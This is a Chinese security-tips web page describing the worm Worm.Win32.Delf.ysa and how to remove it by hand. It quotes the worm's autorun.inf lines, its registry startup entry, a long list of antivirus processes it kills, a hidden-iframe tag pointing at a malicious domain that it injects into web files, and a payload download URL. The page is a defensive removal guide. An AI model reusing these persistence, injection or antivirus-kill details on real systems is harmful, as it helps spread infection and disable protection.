各分区根目录释放shell.exe,autorun.inf 的病毒清除方法

所属分类: 实用技巧 / 病毒查杀 阅读数: 964
收藏 0 赞 0 分享
病毒名:Trojan-psw.Win32.Magania.os 卡巴
  Worm.Win32.Delf.ysa 瑞星 
  文件变化: 
  释放文件
  C:\WINDOWS\system32\Shell.exe
  C:\WINDOWS\system32\Shell.pci
  C:\pass.dic

  各分区根目录释放
  shell.exe
  autorun.inf

  autorun.inf内容
  [Autorun]
  OPEN=Shell.exe
  shellexecute=Shell.exe
  shell\Auto\command=Shell.exe

  修改注册表:
  创建启动项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        <Shell.exe><C:\WINDOWS\system32\Shell.exe>
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
为0 
  破坏显示隐藏文件
  其他行为

  停止server服务
  查找SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\密码防盗专家 综合版 注册表项
  找到则将其删除

  终止以下进程或关闭窗口
KVXP.KXP
KVMonXP.KXP
RavMon.exe
RavMonClass
TfLockDownMain
ZoneAlarm
ZAFrameWnd
VirusScan
Symantec AntiVirus
Duba
Wrapped gift Killer
IceSword
pjf(ustc)

EGHOST.EXE
PasswordGuard.exe
MAILMON.EXE
KAVPFW.EXE
IPARMOR.EXE
_AVP32.EXE..
_AVPCC.EXE
_AVPM.EXEAVP32.EXE
AVPCC.EXE
AVPM.EXE
AVP.EXE
NAVAPW32.EXE
NAVW32.EXE
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

  遍历非系统分区的.ASP .exe .com .pif .exe .ASPX .COM .HTM .HTML .JSP .PHP文件
感染.ASP
.ASPX
.COM
.HTM
.HTML
.JSP
.PHP
文件
在其后面加入 <iframe src=http://www.photoyahoo5.com                                           width=0 height=0></iframe>的代码

  感染.exe .com .pif .exe
  在其头部加入64516字节的内容 属于文件头寄生感染

  连接网络下载hXXp://www.photoyahoo5.com/tools/01.exe到C盘根目录下

  清除方法:
  1.安全模式下:(重启系统长按F8直到出现提示,然后选择进入安全模式)

  把下面的 代码拷入记事本中然后另存为1.reg文件
 Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"



  双击1.reg把这个注册表项导入

  双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定

  然后删除
 C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic 


  以及各个分区下面的shell.exe
  autorun.inf

  2.删除病毒启动项(开始菜单-运行-输入“msconfig”-启动-删除带Shell的项)
  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

  3.利用反病毒软件修复受感染的exe文件
  4.修复被修改的网页文件
更多精彩内容其他人还在看

手工毒霸删除瓢虫病毒的图文教程第1/3页

手工毒霸删除瓢虫病毒的图文教程
收藏 0 赞 0 分享

19.exe,pagefile.pif专杀 pagefile.pif病毒 auto.inf

手工查杀新落雪病毒(19.exe,pagefile.pif,autorun.inf)
收藏 0 赞 0 分享

happy2008病毒专杀 happy2008病毒

Happy2008.zip病毒分析手动解决
收藏 0 赞 0 分享

avwghmn.dll svchost.exe病毒删除方法

avwghmn.dll svchost.exe病毒删除方法
收藏 0 赞 0 分享

木马程序Trojan-Spy.Win32.Agent.cfu清除方法

木马程序Trojan-Spy.Win32.Agent.cfu清除方法
收藏 0 赞 0 分享

Downloader Win32.Delf.dqu(IRAT.rmvb,mm.exe)分析查杀

Downloader Win32.Delf.dqu(IRAT.rmvb,mm.exe)分析查杀
收藏 0 赞 0 分享

中病毒后常用的解决方法病毒终极解决方案

中病毒后常用的解决方法病毒终极解决方案
收藏 0 赞 0 分享

系统时间改为2000年 修改系统时间病毒

系统时间改为2000年 修改系统时间病毒
收藏 0 赞 0 分享

病毒的万能查杀方法第1/2页

当发现病毒后,不要害怕,我们可以按照下面的方法,去试试,一般只需要不要给病毒运行的机会就可以了,一般进安全模式,去除病毒可能隐藏的启动项里。
收藏 0 赞 0 分享

sreng免费下载 sreng最新版下载

病毒查找利器
收藏 0 赞 0 分享
查看更多